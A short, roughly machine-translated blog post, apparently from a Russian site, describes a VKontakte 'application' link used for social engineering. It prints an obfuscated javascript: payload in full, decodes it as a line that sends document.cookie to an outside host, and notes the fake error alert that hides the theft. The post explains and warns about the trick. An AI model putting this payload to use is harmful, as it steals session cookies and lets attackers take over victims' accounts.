12:51 Even with closed holes in the "vkontakte" you can make a xss | |
Inviting me here the other day to add a single application Vkontakte. Interest picked up - and I climbed up to watch. Here is what I saw: string length, so the input field application does not fit. I will give it completely: javascript: page = String.fromCharCode (105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105, 109,103,46,115,114,99,61,39,104,116,116,112, 58,47,47,118,112,111,112,107,117,46,111,114,103,47,115,117,112,47, 115,46,112,104,112,63,113,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59); eval (page); alert (unescape ("% u041D% u0435% 20% u0443% u0434% u0430% u0435% u0442% u0441% u044F% 20% u0432% u044B% u043F% u043E% u043B% u043D% u0438% u0442% u044C% 20% u0434% u0435% u0439% u0441% u0442% u0432% u0438% u0435% 21 ")) " All fairly trivial: the first runs a script that sends the cookie haters: img = new Image (); img.src = 'http://vpopku.org/sup/s.php?q =' + document.cookie; And then, the user alert'om message: Unable to perform action! " Seeing that, the user, though angry, but did not suspect anything, closes the application. So, I want to say again that even if you close all security holes in Web sites, it will always remain the most effective way at all times - social engineering. P.S. First encounter with this particular exercise in social engineering and XSS. If we repeat - excuse. | |
|
Total comments: 0 | |